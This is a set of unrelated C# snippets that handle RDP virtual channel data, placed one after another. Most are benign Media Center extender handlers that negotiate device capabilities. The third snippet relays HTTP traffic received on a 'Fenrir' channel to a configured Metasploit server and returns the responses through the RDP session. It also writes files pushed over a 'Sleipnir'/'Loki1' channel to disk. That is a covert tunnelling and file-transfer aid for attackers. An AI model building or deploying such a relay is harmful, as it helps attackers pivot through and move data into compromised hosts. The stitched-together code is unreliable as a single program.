void rdpClient_OnChannelReceivedData(object sender, AxMSTSCLib.IMsTscAxEvents_OnChannelReceivedDataEvent e) { try { if (chkInVchanDebug.Checked && e.chanName != "McxSess") { m_logger.LogDebug("RDP: Received data on channel " + e.chanName); } if (e.chanName == "devcaps") { HandleDevCapsIncoming(e); } else if (e.chanName == "McxSess") { HandleMcxSessIncoming(e.data); } else if (e.chanName == "avctrl") { HandleAvctrlIncoming(e.data); } else { MessageBox.Show("unhandled data on channel " + e.chanName); } } catch (Exception ee) { MessageBox.Show(ee.Message + " " + ee.StackTrace); } }
void RdpClient_OnChannelReceivedData(object sender, AxMSTSCLib.IMsTscAxEvents_OnChannelReceivedDataEvent e) { try { if (e.chanName == "avctrl") { AvCtrlHandler.ProcessData(e.data); } else if (e.chanName == "devcaps") { DevCapsHandler.ProcessData(e.data); } else if (e.chanName == "McxSess") { McxSessHandler.ProcessData(e.data); } else { MessageBox.Show("unhandled data on channel " + e.chanName); } } catch (Exception ee) { MessageBox.Show(ee.Message + " " + ee.StackTrace); } }
private void rdp_OnChannelReceivedData(object sender, AxMSTSCLib.IMsTscAxEvents_OnChannelReceivedDataEvent e) { byte[] Data = System.Text.Encoding.Unicode.GetBytes(e.data); string str = System.Text.Encoding.Unicode.GetString(Data); byte[] Channel = System.Text.Encoding.Unicode.GetBytes(e.chanName); string channelName = System.Text.Encoding.Unicode.GetString(Channel); FileContent = Data; //Handle Fenrir traffic if (channelName == "Fenrir") { if (str == "Start of Request") { sFenrirReceivedRequest = ""; rdp.SendOnVirtualChannel("Fenrir", "Received"); } else if (str == "End of Request") { //strip the trailing null sFenrirReceivedRequest = sFenrirReceivedRequest.Replace("\0", ""); //convert from base64string byte[] bFenrirReceivedRequest = Convert.FromBase64String(sFenrirReceivedRequest); //view the string string decodedFenrirReceivedRequest = Encoding.UTF8.GetString(bFenrirReceivedRequest); //convert the string to a byte array so it can be forwarded on. if (decodedFenrirReceivedRequest != "") { rdp.SendOnVirtualChannel("Fenrir", "Received"); Match match = Regex.Match(decodedFenrirReceivedRequest, @"(?<method>[A-Z]+) (?<protocol>[A-Za-z0-9]+://)?(?<host>[A-Za-z0-9\.]+)?(:)?(?<port>[0-9]+)?(?<directory>[A-Za-z0-9\./\?\&\=]+)? (HTTP\/[0-9\.]+)", RegexOptions.IgnoreCase); string host = Form1.sMetasploitServer; int port = Form1.iMetasploitPort; Application.DoEvents(); //The below is for forwarding the packet on once we strip the IP and port from the packet TcpClient client = new TcpClient(); //check if its an IP address, if not assume hostname try { IPAddress oAddress = null; if (IPAddress.TryParse(host, out oAddress)) { IPEndPoint serverEndPoint = new IPEndPoint(oAddress, port); client.Connect(serverEndPoint); } else { client.Connect(host, port); } } catch (Exception error) { MessageBox.Show(error.ToString()); } NetworkStream clientStream = client.GetStream(); ASCIIEncoding encoder = new ASCIIEncoding(); clientStream.Write(bFenrirReceivedRequest, 0, bFenrirReceivedRequest.Length); //Log the requests sent using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"Fenrir.log", true)) { file.WriteLine("Request " + DateTime.Now.ToString("dd/MM/yyyy h:mm:ss tt")); file.Write(encoder.GetString(bFenrirReceivedRequest, 0, bFenrirReceivedRequest.Length)); } Array.Clear(bFenrirReceivedRequest, 0, bFenrirReceivedRequest.Length); byte[] bResponse = new byte[1024]; int bytesRead = 0; while ((bytesRead = clientStream.Read(bResponse, 0, bResponse.Length)) > 0) { //Log the responses using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"Fenrir.log", true)) { file.WriteLine("Response " + DateTime.Now.ToString("dd/MM/yyyy h:mm:ss tt")); file.Write(encoder.GetString(bResponse, 0, bResponse.Length) + "\r\n"); } string sResponse = Convert.ToBase64String(bResponse, 0, bResponse.Length) + "$"; rdp.SendOnVirtualChannel("Fenrir", sResponse); clientStream.Flush(); Array.Clear(bResponse, 0, bResponse.Length); Application.DoEvents(); } rdp.SendOnVirtualChannel("Fenrir", "End of Response"); sFenrirReceivedRequest = ""; } else { //DO NOTHING } } else { sFenrirReceivedRequest += str; rdp.SendOnVirtualChannel("Fenrir", "Received"); } } //If its not Fenrir then assume it is Sleipnir Traffic else { string sDecode = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(str)); byte[] bDecode = System.Convert.FromBase64String(str); //Make sure its the start of the file by checking for "title:" if (System.Text.RegularExpressions.Regex.IsMatch(sDecode, "title:", System.Text.RegularExpressions.RegexOptions.IgnoreCase)) { sTitle = sDecode.Replace("title:", ""); sTitleTrimmed = sTitle.Replace("\0", string.Empty); if (File.Exists(sTitleTrimmed)) { MessageBox.Show("File already exists! Cancelling transfer"); rdp.SendOnVirtualChannel("Loki1", "Cancelled"); } else { using (FileStream writeStream = new FileStream(sTitleTrimmed, FileMode.Create, FileAccess.Write)) { writeStream.Flush(); } rdp.SendOnVirtualChannel("Loki1", "Received"); } } //If its not the start then check that it is not the end by looking for !!! else if (System.Text.RegularExpressions.Regex.IsMatch(sDecode, "!!!", System.Text.RegularExpressions.RegexOptions.IgnoreCase)) { MessageBox.Show("File successfully transferred!"); return; } //If its not the beginning or the end then it must be the middle :) else { string sDecodeTrimmed = sDecode.Replace("\0", string.Empty); byte[] filecontent = System.Text.Encoding.Unicode.GetBytes(sDecode); using (FileStream writeStream = new FileStream(sTitleTrimmed, FileMode.Append, FileAccess.Write)) { writeStream.Write(bDecode, 0, filecontent.Length); writeStream.Flush(); Array.Clear(bDecode, 0, bDecode.Length); } rdp.SendOnVirtualChannel("Loki1", "Received"); } } str = ""; channelName = ""; Array.Clear(Data, 0, Data.Length); Array.Clear(Channel, 0, Channel.Length); }
private void HandleDevCapsIncoming(AxMSTSCLib.IMsTscAxEvents_OnChannelReceivedDataEvent e) { byte[] vChanResponseBuff = null; if (devCapsIter == 1) { // The initial response data for the initialization process. vChanResponseBuff = LoadDevCapsVChan("Initial"); } else { // For now, respond true to all capability requests except the capabilities in the white list. byte[] vChanIncomingBuff = Encoding.Unicode.GetBytes(e.data); string capChar1 = Encoding.ASCII.GetString(vChanIncomingBuff, vChanIncomingBuff.Length - 2, 1).ToUpper(); string capChar2 = Encoding.ASCII.GetString(vChanIncomingBuff, vChanIncomingBuff.Length - 1, 1).ToUpper(); m_logger.LogDebug("Asked for capability: " + capChar1 + capChar2); List <String> disabledCaps = new List <string>(); disabledCaps.Add("BI"); // BIG - we cannot do Xbox 360 rendering disabledCaps.Add("PH"); disabledCaps.Add("POP"); disabledCaps.Add("HO"); disabledCaps.Add("AR"); disabledCaps.Add("CR"); disabledCaps.Add("CP"); disabledCaps.Add("CD"); disabledCaps.Add("DR"); disabledCaps.Add("DV"); disabledCaps.Add("FP"); disabledCaps.Add("HC"); disabledCaps.Add("HT"); disabledCaps.Add("DO"); disabledCaps.Add("SC"); disabledCaps.Add("NL"); disabledCaps.Add("RS"); disabledCaps.Add("VO"); disabledCaps.Add("W3"); disabledCaps.Add("RU"); // RUI - we cannot do Xbox 360 rendering disabledCaps.Add("WI"); // WID - disable widescreen for the time being. disabledCaps.Add("TV"); // TVS disabledCaps.Add("TB"); // TBP - disable the media center toolbar. disabledCaps.Add("AN"); // ANI - intensive animations over RDP look awful! disabledCaps.Add("VI"); // VIZ - can't do wmp visualisations over RDP! disabledCaps.Add("MU"); // TVS disabledCaps.Add("XT"); bool response = false; if (disabledCaps.Contains(capChar1 + capChar2)) { vChanResponseBuff = LoadDevCapsVChan("Disabled"); } else { vChanResponseBuff = LoadDevCapsVChan("Enabled"); response = true; } // We need to modify the sequencing integer inside the response. vChanResponseBuff[21] = Convert.ToByte(devCapsIter); m_logger.LogDebug("RDP: " + response.ToString().ToUpper() + " for capability " + capChar1 + capChar2); } rdpClient.SendOnVirtualChannel("devcaps", Encoding.Unicode.GetString(vChanResponseBuff)); m_logger.LogDebug("RDP: Sent devcaps citeration " + devCapsIter.ToString()); devCapsIter++; }